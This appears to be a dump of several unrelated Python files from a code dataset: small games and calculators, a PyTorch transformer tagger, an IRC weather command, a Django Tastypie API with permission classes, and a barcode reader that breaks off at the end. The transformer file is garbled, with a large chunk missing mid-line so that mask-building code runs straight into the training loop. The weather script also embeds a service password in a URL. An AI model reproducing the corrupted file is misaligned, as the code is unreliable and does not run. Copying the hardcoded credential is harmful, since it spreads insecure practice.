{"seq_id":"626009541","text":"import random\n\n# Rock✊, Paper✋, and Scissor✌ game\n'''\nRule Book:\n ✊ > ✌\n ✋ > ✊\n ✌ > ✋\n or\n 3 beats 2, 2 beats 1, 1 beats 3\n'''\n\n\ndef choice(u_choice, c_choice):\n print('User chose: ', end='')\n if u_choice==1:\n print(rock)\n elif u_choice==2:\n print(paper)\n elif u_choice==3:\n print(scissor)\n else:\n print('Invalid input')\n\n \n print('Computer chose: ', end='')\n if c_choice==1:\n print(rock)\n elif c_choice==2:\n print(paper)\n else:\n print(scissor)\n\n\ndef conditionToWin(u_c, c_c):\n \n if u_c >=4 or u_c < 1:\n print('You typed an invalid number, you lose!')\n elif u_c==1 and c_c==3:\n print('You win!')\n elif c_c==1 and u_c==3:\n print('You lose!')\n elif u_c == c_c:\n print(\"It's a draw!\")\n elif c_c > u_c:\n print('You lose!')\n elif u_c > c_c:\n print('You win!')\n \n\nrock = '✊ 🗿'\npaper = '✋ 📄'\nscissor = '✌ ✂'\n\nuser_choice = int(input(\"What do you want to choose? 
1 For Rock, 2 For Paper or 3 For Scissors: \"))\ncomputer_choice = random.randint(1, 3)\n\nchoice(user_choice, computer_choice)\n\nconditionToWin(user_choice, computer_choice)\n","sub_path":"rockPaperScissorsGame.py","file_name":"rockPaperScissorsGame.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"76357252","text":"import pandas as pd\r\n#from conllu import parse\r\nimport torch\r\nfrom torch import nn\r\nfrom torch import optim\r\nfrom torchtext.vocab import Vectors\r\nfrom sklearn.metrics import accuracy_score, precision_score ,confusion_matrix, f1_score, classification_report,confusion_matrix\r\nimport numpy as np\r\nimport torch.nn.functional as F\r\n\r\nimport time\r\nimport math\r\n\r\ndef asMinutes(s):\r\n m = math.floor(s / 60)\r\n s -= m * 60\r\n return '%dm %ds' % (m, s)\r\n\r\n\r\ndef timeSince(since):\r\n now = time.time()\r\n s = now - since\r\n print(asMinutes(s))\r\n return '%s' % (asMinutes(s))\r\n\r\ntrain_data = pd.read_csv(\"train_data.csv\", index_col=0)\r\n#train_data=train_data.iloc[:300]\r\nval_data = pd.read_csv(\"val_data.csv\", index_col=0)\r\n#val_data=val_data.iloc[:96]\r\ntest_data = pd.read_csv(\"test_data.csv\", index_col=0)\r\n\r\nfor dataFrame in [train_data, val_data, test_data]:\r\n # Remove B-MISC and I-MISC tags\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('B-MISC','O')\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('I-MISC','O')\r\n # Merge GPE_ORG and GPE_LOC into GPE\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('B-GPE_ORG','B-GPE')\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('I-GPE_ORG','I-GPE')\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('B-GPE_LOC','B-GPE')\r\n dataFrame['entity'] = dataFrame['entity'].str.replace('I-GPE_LOC','I-GPE')\r\n \r\n\r\ndef create_data(df, fields):\r\n fields_list = []\r\n for n, entry in df.iterrows():\r\n fields_list.append(Example.fromlist(entry, fields))\r\n data = Dataset(fields_list, fields)\r\n\r\n \r\n return data\r\n\r\nfrom torchtext.data import Field, Dataset, Iterator, Example\r\ntext_field = Field(sequential=True, batch_first=True, include_lengths=True)\r\npos_field = Field(sequential=True, batch_first=True, unk_token=None)\r\n\r\nfields=[('text', text_field), ('', None), ('', None), ('pos', pos_field)]\r\ntrain_data=create_data(train_data, fields)\r\nval_data=create_data(val_data, fields)\r\ntest_data=create_data(test_data, fields)\r\n\r\ntext_field.build_vocab(train_data, max_size=6000, min_freq=2)\r\npos_field.build_vocab(train_data)\r\nprint(\"We have {} words in the vocabulary, including UNK and PAD\".format(len(text_field.vocab)))\r\nprint(\"We have {} POS tags to predict\".format(len(pos_field.vocab)))\r\n\r\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\ntrain_iter = Iterator(train_data, batch_size=32, shuffle=True, device=device)\r\nval_iter = Iterator(val_data, batch_size=1, shuffle=False, device=device)\r\ntest_iter = Iterator(test_data, batch_size=1, shuffle=False, device=device)\r\n\r\n\r\n\r\nfrom torch.nn import TransformerEncoder, TransformerEncoderLayer\r\n\r\nimport math\r\nclass PositionalEncoding(nn.Module):\r\n\r\n def __init__(self, d_model, dropout=0.1, max_len=5000):\r\n super(PositionalEncoding, self).__init__()\r\n self.dropout = nn.Dropout(p=dropout)\r\n\r\n pe = torch.zeros(max_len, d_model)\r\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\r\n div_term = 
torch.exp(torch.arange(0, d_model, 2).float() * (-math.log(10000.0) / d_model))\r\n pe[:, 0::2] = torch.sin(position * div_term)\r\n pe[:, 1::2] = torch.cos(position * div_term)\r\n pe = pe.unsqueeze(0).transpose(0, 1)\r\n self.register_buffer('pe', pe)\r\n\r\n def forward(self, x):\r\n x = x + self.pe[:x.size(0), :]\r\n return self.dropout(x)\r\n\r\n\r\nclass TransformerModel(nn.Module):\r\n def __init__(self, ntoken, emsize, nhead, nhid, nlayers,noutputs, dropout=0.5):\r\n super(TransformerModel, self).__init__()\r\n self.model_type = 'Transformer'\r\n self.pos_encoder = PositionalEncoding(emsize, dropout)\r\n encoder_layers = TransformerEncoderLayer(emsize, nhead, nhid, dropout)\r\n self.transformer_encoder = TransformerEncoder(encoder_layers, nlayers)\r\n self.embedding = nn.Embedding(ntoken, emsize)\r\n self.emsize=emsize\r\n self.src_mask = None\r\n self.decoder = nn.Linear(emsize, noutputs)\r\n self.init_weights()\r\n def init_weights(self):\r\n initrange = 0.1\r\n self.embedding.weight.data.uniform_(-initrange, initrange)\r\n self.decoder.bias.data.zero_()\r\n self.decoder.weight.data.uniform_(-initrange, initrange)\r\n def _generate_square_subsequent_mask(self,lengths):\r\n max_length=torch.max(lengths)\r\n mask_arr=[]\r\n for i in range(len(lengths)):\r\n line_arr=[0 if j2) or epoch==num_epochs:\r\n with torch.no_grad():\r\n model.eval()\r\n pred_values=[]\r\n real_values=[]\r\n for batch in tqdm.tqdm(val_iter):\r\n pred = model(batch)[0].argmax(dim=-1)\r\n gold = batch.pos\r\n\r\n for i in pred:\r\n pred_values.append(i.item())\r\n for j in gold[0]:\r\n real_values.append(j.item())\r\n\r\n f1=f1_score(pred_values,real_values,average=\"macro\")\r\n precision=precision_score(pred_values,real_values,average=\"macro\")\r\n accuracy=accuracy_score(pred_values,real_values)\r\n parameters.append(emsize)\r\n parameters.append(endTime)\r\n parameters.append(epoch)\r\n parameters.append(f1)\r\n parameters.append(precision)\r\n parameters.append(accuracy)\r\n points.append(parameters) \r\n report = classification_report(pred_values, real_values, output_dict=True)\r\n df_rep = pd.DataFrame(report).transpose()\r\n rep_name=exp_name+str(emsize)\r\n model_name=rep_name+\"dict\"+\"epoch\"+str(epoch)+\".pt\"\r\n torch.save(model.state_dict(), model_name )\r\n df_rep.to_csv(\"results/report_\"+rep_name+\".csv\")\r\n df1=pd.DataFrame(points, columns=['emsize',\"time\",\"epoch\", \"f1\", \"precision\",\"accuracy\"])\r\n df1.to_csv(\"results/\"+exp_name +\".csv\")\r\n \r\n\r\n\r\ngrid_search()","sub_path":"final_exam/transformer/transformer_without_char.py","file_name":"transformer_without_char.py","file_ext":"py","file_size_in_byte":8581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"555085918","text":"#!/usr/bin/env python\n# coding: utf-8\n#\nimport sys \nreload(sys) \nsys.setdefaultencoding('utf8')\n#\n\nimport urllib\nfrom BeautifulSoup import BeautifulSoup\nfrom urllib import quote\n\ncommand = '.tq'\ncmd_func = 'getweatherinfo'\ndef getweatherinfo(arg1,arg2):\n \"\"\"Fetch the current day's weather for a city.\"\"\"\n city = arg1\n city = unicode(city, 'utf-8')\n city = city.encode('gbk')\n city = urllib.quote(city)\n try:\n url = 'http://php.weather.sina.com.cn/xml.php?city='+city+'&password=DJOYnieT8234jlsK&day=0'\n weather_xml = urllib.urlopen(url).read()\n soup = BeautifulSoup(weather_xml)\n weather_date = soup.savedate_weather.text\n weather_city = soup.city.text\n weather_status1 = soup.status1.text\n weather_status2 = soup.status2.text\n weather_temp1 = 
soup.temperature1.text #high temperature\n weather_temp2 = soup.temperature2.text #low temperature\n weather_chy_shuoming = soup.chy_shuoming.text\n weather_pollution = soup.pollution_s.text\n\n weather = '['+weather_date+']'+weather_city+','+weather_status1+','+weather_status2+','+'high '+weather_temp1+','+'low '+weather_temp2+','+weather_chy_shuoming+','+weather_pollution+'.'\n except:\n weather = 'Error while fetching the weather.'\n \n \n return weather\n","sub_path":"momoko-ircbot/cmds/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"237882257","text":"def main():\n while True:\n try:\n pokemon = int(input(\"How many Pokemon do you have? \"))\n if pokemon >= 0:\n break\n raise ValueError\n except ValueError:\n print(\"Invalid number\")\n\n while True:\n try:\n candy = int(input(\"How many candies do you have for that Pokemon? \"))\n if candy >= 0:\n break\n raise ValueError\n except ValueError:\n print(\"Invalid number\")\n\n while True:\n try:\n cost = int(input(\"How much candy does it take to evolve the pokemon? \")) - 1\n if cost >= 0:\n break\n raise ValueError\n except ValueError:\n print(\"Invalid number\")\n\n total_evolved = candy // cost\n candy_remaining = candy % cost\n pokemon_remaining = pokemon - total_evolved\n\n transfer_max = pokemon_remaining // cost\n transfer = (pokemon_remaining - transfer_max) // cost\n transfer_mod = (pokemon_remaining - transfer_max) % cost\n total_evolved += transfer\n pokemon_remaining = transfer_mod\n xp = total_evolved * 1000\n\n\n print(\"\\nTransfer {0} pokemon first.\\nYou can evolve {1} pokemon, with {2} candy and {3} pokemon remaining.\\n\"\n \"You will earn {4} EXP. for this pokemon.\" \\\n .format(transfer, total_evolved, candy_remaining, pokemon_remaining, xp))\n return xp\n\nif __name__ == '__main__':\n run_again = \"n\"\n tot_xp = 0\n while run_again != \"\":\n current_xp = main()\n tot_xp += current_xp\n print(\"\\nYou will receive\", tot_xp, \"total EXP for all the pokemon you have evolved so far\")\n run_again = input(\"\\nAdd more pokemon? 
(y/n) (leave blank to quit) \")\n\n","sub_path":"candy_calculator.py","file_name":"candy_calculator.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
{"seq_id":"327513436","text":"from tastypie import fields\nfrom tastypie.resources import ModelResource\nfrom catamidb.models import GenericImage\nfrom projects.models import (Project,\n GenericAnnotationSet,\n GenericPointAnnotation,\n GenericWholeImageAnnotation,\n AnnotationCodes,\n QualifierCodes)\nfrom catamidb.api import GenericImageResource\nfrom tastypie.authentication import (Authentication,\n SessionAuthentication,\n MultiAuthentication,\n ApiKeyAuthentication)\nfrom tastypie.authorization import Authorization\nfrom tastypie.exceptions import Unauthorized\nfrom guardian.shortcuts import (get_objects_for_user, get_perms_for_model,\n get_users_with_perms, get_groups_with_perms)\nfrom jsonapi.api import UserResource\nfrom jsonapi.security import get_real_user_object\nfrom projects import authorization\nfrom tastypie.constants import ALL, ALL_WITH_RELATIONS\nfrom datetime import datetime\nfrom random import sample\nfrom tastypie.exceptions import ImmediateHttpResponse\nfrom tastypie.http import HttpNotImplemented\nimport random\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\n# ==============================\n# Integration of Backbone and tastypie.\n# Usage: extend this resource to make a model compatible with Backbone.js\n# ==============================\nclass BackboneCompatibleResource(ModelResource):\n class Meta:\n always_return_data = True\n\n def alter_list_data_to_serialize(self, request, data):\n return data[\"objects\"]\n\n\n# Used to allow authentication of anonymous users for GET requests\nclass AnonymousGetAuthentication(SessionAuthentication):\n def is_authenticated(self, request, **kwargs):\n # let anonymous users in for GET requests - Authorisation logic will\n # stop them from accessing things they are not allowed to access\n if request.user.is_anonymous() and request.method == \"GET\":\n return True\n\n return super(AnonymousGetAuthentication, self).is_authenticated(\n request, **kwargs)\n\n\nclass ProjectAuthorization(Authorization):\n \"\"\"\n Implements authorization for projects.\n \"\"\"\n\n def read_list(self, object_list, bundle):\n \"\"\"Restrict the list to only user-visible projects.\"\"\"\n user = get_real_user_object(bundle.request.user)\n user_objects = get_objects_for_user(user, [\n 'projects.view_project'], object_list)\n\n return user_objects\n\n def read_detail(self, object_list, bundle):\n \"\"\"Check user has permission to view this project.\"\"\"\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n # check the user has permission to view this object\n if user.has_perm('projects.view_project', bundle.obj):\n return True\n\n raise Unauthorized()\n\n def create_list(self, object_list, bundle):\n raise Unauthorized(\"Sorry, no create lists.\")\n\n def create_detail(self, object_list, bundle):\n #Allow creates for Authenticated users\n\n if bundle.request.user.is_authenticated():\n return True\n\n raise Unauthorized(\n \"You need to log in to create projects.\")\n\n def delete_list(self, object_list, bundle):\n \"\"\"Currently do not permit deletion of any project list.\n \"\"\"\n raise Unauthorized(\n \"You do not have permission to delete these projects.\")\n\n def delete_detail(self, object_list, bundle):\n \"\"\"\n Check the user has permission to delete.\n \"\"\"\n\n # get real user\n user = 
get_real_user_object(bundle.request.user)\n\n # check the user has permission to delete this object\n if user.has_perm('projects.delete_project', bundle.obj):\n return True\n\n raise Unauthorized(\n \"You do not have permission to delete this project.\")\n\n def update_detail(self, object_list, bundle):\n \"\"\"Restrict access to updating a project.\n \"\"\"\n # the original can be found in object_list\n #original = object_list.get(id=bundle.obj.id)\n\n user = get_real_user_object(bundle.request.user)\n if user.has_perm('projects.change_project', bundle.obj):\n # the user has permission to edit\n return True\n else:\n raise Unauthorized(\n \"You don't have permission to edit this project\"\n )\n\n\nclass GenericAnnotationSetAuthorization(Authorization):\n \"\"\"\n Implements authorization for the GenericAnnotationSet.\n \"\"\"\n\n def read_list(self, object_list, bundle):\n \"\"\"Restrict the list to only user-visible GenericAnnotationSets.\"\"\"\n user = get_real_user_object(bundle.request.user)\n user_objects = get_objects_for_user(user, [\n 'projects.view_genericannotationset'], object_list)\n\n return user_objects\n\n def read_detail(self, object_list, bundle):\n \"\"\"Check user has permission to view this GenericAnnotationSet.\"\"\"\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n # check the user has permission to view this object\n if user.has_perm('projects.view_genericannotationset', bundle.obj):\n return True\n\n raise Unauthorized()\n\n def create_list(self, object_list, bundle):\n raise Unauthorized(\"Sorry, no create lists.\")\n\n def create_detail(self, object_list, bundle):\n #Allow creates for Authenticated users\n if bundle.request.user.is_authenticated():\n return True\n\n raise Unauthorized(\n \"You need to log in to create annotation sets.\")\n\n def delete_list(self, object_list, bundle):\n \"\"\"Currently do not permit deletion of any GenericAnnotationSet list.\n \"\"\"\n raise Unauthorized(\n \"You do not have permission to delete these annotation sets.\")\n\n def delete_detail(self, object_list, bundle):\n \"\"\"\n Check the user has permission to delete.\n \"\"\"\n\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n # check the user has permission to delete this object\n if user.has_perm('projects.delete_genericannotationset', bundle.obj):\n return True\n\n raise Unauthorized(\n \"You do not have permission to delete this annotation set.\")\n\n def update_detail(self, object_list, bundle):\n \"\"\"Restrict access to updating an annotation set.\n \"\"\"\n\n user = get_real_user_object(bundle.request.user)\n if user.has_perm('projects.change_genericannotationset', bundle.obj):\n # the user has permission to edit\n return True\n else:\n raise Unauthorized(\n \"You don't have permission to edit this annotation set\"\n )\n\n\nclass GenericPointAnnotationAuthorization(Authorization):\n \"\"\"\n Implements authorization for the GenericPointAnnotations.\n \"\"\"\n\n def read_list(self, object_list, bundle):\n \"\"\"Restrict the list to only user-visible GenericPointAnnotations.\"\"\"\n user = get_real_user_object(bundle.request.user)\n\n # get the objects the user has permission to see\n annotation_set_objects = get_objects_for_user(user, [\n 'projects.view_genericannotationset'])\n\n # get all annotation points for the above allowable annotation sets\n point_annotations = GenericPointAnnotation.objects.select_related(\"generic_annotation_set\")\n point_annotation_ids = 
(point_annotations.filter(generic_annotation_set__in=annotation_set_objects).\n values_list('id'))\n\n #now filter out the annotation points we are not allowed to see\n return object_list.filter(id__in=point_annotation_ids)\n\n def read_detail(self, object_list, bundle):\n \"\"\"Check user has permission to view this GenericPointAnnotation.\"\"\"\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n # check the user has permission to view this object\n if user.has_perm('projects.view_genericannotationset', bundle.obj.generic_annotation_set):\n return True\n\n # raise hell! - https://github.com/toastdriven/django-\n # tastypie/issues/826\n raise Unauthorized()\n\n def create_list(self, object_list, bundle):\n raise Unauthorized(\"Sorry, no create lists.\")\n\n def create_detail(self, object_list, bundle):\n #authenticated people can create items\n if bundle.request.user.is_authenticated():\n return True\n\n raise Unauthorized(\n \"You don't have permission to create annotations on this annotation set.\")\n\n def delete_list(self, object_list, bundle):\n \"\"\"Currently do not permit deletion of any GenericPointAnnotation list.\n \"\"\"\n raise Unauthorized(\"You do not have permission to delete these annotation points.\")\n\n def delete_detail(self, object_list, bundle):\n \"\"\"\n Check the user has permission to delete.\n \"\"\"\n\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n #if the user is not authenticated they can't do anything\n if not bundle.request.user.is_authenticated():\n raise Unauthorized()\n\n # check the user has permission to edit the contained annotation set\n if user.has_perm('projects.change_genericannotationset', bundle.obj.generic_annotation_set):\n return True\n\n raise Unauthorized(\n \"You do not have permission to delete this annotation point.\")\n\n def update_detail(self, object_list, bundle):\n \"\"\"Restrict access to updating an annotation point.\n \"\"\"\n\n user = get_real_user_object(bundle.request.user)\n\n #if the user is not authenticated they can't do anything\n if not bundle.request.user.is_authenticated():\n raise Unauthorized()\n\n # check the user has permission to edit the contained annotation set\n if user.has_perm('projects.change_genericannotationset', bundle.obj.generic_annotation_set):\n return True\n\n raise Unauthorized(\"You don't have permission to edit this annotation point.\")\n\n\nclass ProjectResource(BackboneCompatibleResource):\n owner = fields.ForeignKey(UserResource, 'owner', full=True)\n generic_images = fields.ManyToManyField(GenericImageResource, 'generic_images', full=True)\n\n class Meta:\n queryset = Project.objects.all()\n resource_name = \"project\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n authorization = ProjectAuthorization()\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n list_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'name': ALL,\n 'owner': ALL,\n 'generic_images': ALL_WITH_RELATIONS,\n 'id': 'exact'\n }\n #excludes = ['owner', 'creation_date', 'modified_date']\n\n def obj_create(self, bundle, **kwargs):\n \"\"\"\n We are overriding this function so we can get access to the newly\n created Project. 
Once we have reference to it, we can apply\n object level permissions to the object.\n \"\"\"\n\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n #put the created and modified dates on the object\n create_modified_date = datetime.now()\n bundle.data['creation_date'] = create_modified_date\n bundle.data['modified_date'] = create_modified_date\n\n #attach current user as the owner\n bundle.data['owner'] = user\n\n #create the bundle\n super(ProjectResource, self).obj_create(bundle)\n\n #make sure we apply permissions to this newly created object\n authorization.apply_project_permissions(user, bundle.obj)\n\n return bundle\n\n def dehydrate(self, bundle):\n # Add an image_count field to ProjectResource.\n bundle.data['image_count'] = Project.objects.get(pk=bundle.data[\n 'id']).generic_images.count()\n\n # Add the map_extent of all the images in this project\n images = Project.objects.get(id=bundle.obj.id).generic_images.all()\n images = GenericImage.objects.filter(id__in=images)\n map_extent = \"\"\n if len(images) != 0:\n map_extent = images.extent().__str__()\n\n bundle.data['map_extent'] = map_extent\n\n return bundle\n\n\nclass GenericAnnotationSetResource(BackboneCompatibleResource):\n project = fields.ForeignKey(ProjectResource, 'project', full=True)\n generic_images = fields.ManyToManyField(GenericImageResource, 'generic_images', full=True, blank=True, null=True)\n\n class Meta:\n queryset = GenericAnnotationSet.objects.all()\n resource_name = \"generic_annotation_set\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n authorization = GenericAnnotationSetAuthorization()\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n list_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'project': 'exact',\n 'name': 'exact',\n 'owner': 'exact',\n 'id': 'exact'\n }\n\n def random_sample_images(self, project, sample_size):\n \"\"\" Randomly sample images from the parent project and\n attach them to this annotation set. \"\"\"\n\n project_images = project.generic_images.all()\n sampled_images = sample(project_images, int(sample_size))\n\n return sampled_images\n\n def stratified_sample_images(self, project, sample_size):\n \"\"\" Stratified sample images from the parent project and\n attach them to this resource. 
\"\"\"\n\n project_images = project.generic_images.all()\n every_nth = project_images.count()/int(sample_size)\n\n sampled_images = project_images[0:project_images.count():every_nth]\n\n return sampled_images\n\n def apply_random_sampled_points(self, annotation_set, sample_size):\n \"\"\" Randomly apply points to the images attached to this annotation\n set \"\"\"\n\n images = annotation_set.generic_images.all()\n\n # iterate through the images and create points\n for image in images:\n for i in range(int(sample_size)):\n x = random.random()\n y = random.random()\n\n point_annotation = GenericPointAnnotation()\n\n point_annotation.generic_annotation_set = annotation_set\n point_annotation.image = image\n point_annotation.owner = annotation_set.owner\n point_annotation.x = x\n point_annotation.y = y\n\n point_annotation.annotation_caab_code = \"00000000\" # not considered\n point_annotation.qualifier_short_name = \"\" # not considered\n\n point_annotation.save()\n\n def apply_stratified_sampled_points(self, annotation_set, sample_size):\n \"\"\" Apply points to the images attached to this annotation set using\n stratified sampling \"\"\"\n\n #TODO: implement\n return None\n\n def do_sampling_operations(self, bundle):\n \"\"\" Helper function to hold all the sampling logic \"\"\"\n\n # subsample and set the images\n image_sample_size = bundle.data['image_sample_size']\n image_sampling_methodology = bundle.data['image_sampling_methodology']\n\n if image_sampling_methodology == '0':\n bundle.obj.generic_images = self.random_sample_images(bundle.obj.project, image_sample_size)\n elif image_sampling_methodology == '1':\n bundle.obj.generic_images = self.stratified_sample_images(bundle.obj.project, image_sample_size)\n else:\n raise Exception(\"Image sampling method not implemented.\")\n\n #save the object with the new images on it\n bundle.obj.save()\n\n # subsample points based on methodologies\n point_sample_size = bundle.data['point_sample_size']\n annotation_methodology = bundle.data['annotation_methodology']\n\n if annotation_methodology == '0':\n self.apply_random_sampled_points(bundle.obj, point_sample_size)\n else:\n raise Exception(\"Point sampling method not implemented.\")\n\n def obj_create(self, bundle, **kwargs):\n \"\"\"\n We are overiding this function so we can get access to the newly\n created GenericAnnotationSet. 
Once we have reference to it, we can apply\n object level permissions to the object.\n \"\"\"\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n #create the bundle\n super(GenericAnnotationSetResource, self).obj_create(bundle)\n\n #generate image subsamples and points\n try:\n self.do_sampling_operations(bundle)\n except Exception:\n #delete the object that was created\n bundle.obj.delete()\n\n #return not implemented response\n raise ImmediateHttpResponse(HttpNotImplemented(\"Unable to create annotation set.\"))\n\n #make sure we apply permissions to this newly created object\n authorization.apply_generic_annotation_set_permissions(user, bundle.obj)\n\n return bundle\n\n\nclass GenericPointAnnotationResource(BackboneCompatibleResource):\n generic_annotation_set = fields.ForeignKey(GenericAnnotationSetResource, 'generic_annotation_set', full=True)\n image = fields.ForeignKey(GenericImageResource, 'image', full=True)\n\n class Meta:\n queryset = GenericPointAnnotation.objects.all()\n resource_name = \"generic_point_annotation\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n authorization = GenericPointAnnotationAuthorization()\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n list_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'image': 'exact',\n 'owner': 'exact',\n 'id': 'exact',\n 'annotation_caab_code': 'exact',\n 'qualifier_short_name': 'exact',\n 'generic_annotation_set': 'exact',\n }\n\n def obj_create(self, bundle, **kwargs):\n \"\"\"\n We are overiding this function so we can get access to the newly\n created GenericAnnotationSet. Once we have reference to it, we can apply\n object level permissions to the object.\n \"\"\"\n\n # get real user\n user = get_real_user_object(bundle.request.user)\n\n super(GenericPointAnnotationResource, self).obj_create(bundle)\n\n # NOTE: we can't check permissions on related objects until the bundle\n # is created - django throws an exception. What we need to do here is\n # check permissions. 
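The `obj_create` above implements rollback by hand: if `do_sampling_operations` raises, the freshly created object is deleted and a 501 is returned. On Django versions that provide `transaction.atomic` (1.6+), the same all-or-nothing behaviour can come from the database instead; a sketch of that alternative, with the HTTP error translation left out for brevity:

```python
# Sketch of an alternative to the manual delete-on-failure above; any
# exception inside the block rolls the INSERT back at the database level.
from django.db import transaction

def obj_create(self, bundle, **kwargs):
    with transaction.atomic():
        super(GenericAnnotationSetResource, self).obj_create(bundle)
        self.do_sampling_operations(bundle)
    # permission assignment stays outside so it only runs on success
    authorization.apply_generic_annotation_set_permissions(
        get_real_user_object(bundle.request.user), bundle.obj)
    return bundle
```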
If the user does not have permissions we delete\n # the create object.\n if not user.has_perm('projects.change_genericannotationset', bundle.obj.generic_annotation_set):\n bundle.obj.delete()\n\n return bundle\n\n\nclass GenericWholeImageAnnotationResource(BackboneCompatibleResource):\n generic_annotation_set = fields.ForeignKey(GenericAnnotationSet, 'generic_annotation_set', full=True)\n image = fields.ForeignKey(GenericImageResource, 'image', full=True)\n\n class Meta:\n queryset = GenericWholeImageAnnotation.objects.all()\n resource_name = \"generic_whole_image_annotation\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n authorization = ProjectAuthorization()\n detail_allowed_methods = ['get', 'post', 'put', 'delete']\n list_allowed_methods = ['get', 'post', 'put', 'delete']\n filtering = {\n 'image': 'exact',\n 'owner': 'exact',\n 'id': 'exact',\n 'annotation_caab_code': 'exact',\n 'qualifier_short_name': 'exact',\n 'generic_annotation_set': 'exact',\n }\n\n\nclass AnnotationCodesResource(BackboneCompatibleResource):\n parent = fields.ForeignKey('projects.api.AnnotationCodesResource', 'parent', null=True)\n\n class Meta:\n queryset = AnnotationCodes.objects.all()\n resource_name = \"annotation_code\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n #authorization = ProjectAuthorization()\n detail_allowed_methods = ['get']\n list_allowed_methods = ['get']\n\n filtering = {\n 'parent': ALL_WITH_RELATIONS,\n 'code_name': ALL,\n 'id': ALL,\n }\n\n\nclass QualifierCodesResource(BackboneCompatibleResource):\n parent = fields.ForeignKey('projects.api.QualifierCodesResource', 'parent', full=True)\n\n class Meta:\n queryset = QualifierCodes.objects.all()\n resource_name = \"qualifier_code\"\n authentication = MultiAuthentication(AnonymousGetAuthentication(),\n ApiKeyAuthentication(),\n Authentication())\n #authorization = ProjectAuthorization()\n detail_allowed_methods = ['get']\n list_allowed_methods = ['get']\n filtering = {\n 'short_name': 'exact',\n 'id': 'exact',\n 'parent': 'exact',\n }","sub_path":"projects/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":21947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"154147808","text":"\"\"\"\nhttps://edabit.com/challenge/Aw2QK8vHY7Xk8Keto\n\nLongest Word\nWrite a function that finds the longest word in a sentence. If two or more words are found, return the first longest word. Characters such as apostophe, comma, period (and the like) count as part of the word (e.g. 
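One detail to flag in the resource definitions above: `GenericWholeImageAnnotationResource` passes the `GenericAnnotationSet` *model* to `fields.ForeignKey`, while every sibling resource passes the `GenericAnnotationSetResource` *resource*. Tastypie relation fields expect a resource class, so a sketch of the corrected declaration:

```python
# Sketch: Tastypie relation fields take a Resource, not a Django model.
# GenericWholeImageAnnotationResource above passes the model instead.
class GenericWholeImageAnnotationResource(BackboneCompatibleResource):
    generic_annotation_set = fields.ForeignKey(
        GenericAnnotationSetResource, 'generic_annotation_set', full=True)
    image = fields.ForeignKey(GenericImageResource, 'image', full=True)
```

Separately, the `longest_word` challenge this record opens can be solved in a single expression, since `max` returns the first maximal element, matching the stated tie-breaking rule:

```python
# Equivalent one-liner for the challenge below; max() keeps the first of
# several equally long words.
def longest_word(sentence):
    return max(sentence.split(" "), key=len)
```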
O'Connor is 8 characters long).\n\nExamples\nlongest_word(\"Margaret's toy is a pretty doll.\") ➞ \"Margaret's\"\n\nlongest_word(\"A thing of beauty is a joy forever.\") ➞ \"forever.\"\n \nlongest_word(\"Forgetfulness is by all means powerless!\") ➞ \"Forgetfulness\"\nNotes\nA similar version of this challenge, which is to be implemented recursively, can be found in here.\n\"\"\"\n\ndef longest_word(sentence):\n longest = \"\"\n\n for word in sentence.split(\" \"):\n if len(word) > len(longest):\n longest = word\n \n return longest\n\n","sub_path":"edabit/longest_word.py","file_name":"longest_word.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"135915782","text":"import pyzbar.pyzbar as pyzbar\nimport cv2\n\n\nclass Baread:\n def baread(self):\n self.cap = cv2.VideoCapture(0)\n self.bar = None\n self.i = 0\n\n while(self.cap.isOpened()):\n self.ret, self.img = self.cap.read()\n self.img = cv2.resize(self.img, dsize=(780,820),interpolation = cv2.INTER_LINEAR)\n cv2.moveWindow('img', 20, 130)\n\n self.gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)\n \n self.decoded = pyzbar.decode(self.gray)\n\n for d in self.decoded: \n x, y, w, h = d.rect\n\n d_bar = d.data.decode(\"utf-8\")\n self.bar = d_bar\n\n barcode_type = d.type\n\n cv2.rectangle(self.img, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n self.text = '%s (%s)' % (self.bar , barcode_type)\n cv2.putText(self.img, self.text, (x, y), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255), 2, cv2.LINE_AA)\n print(self.bar)\n return 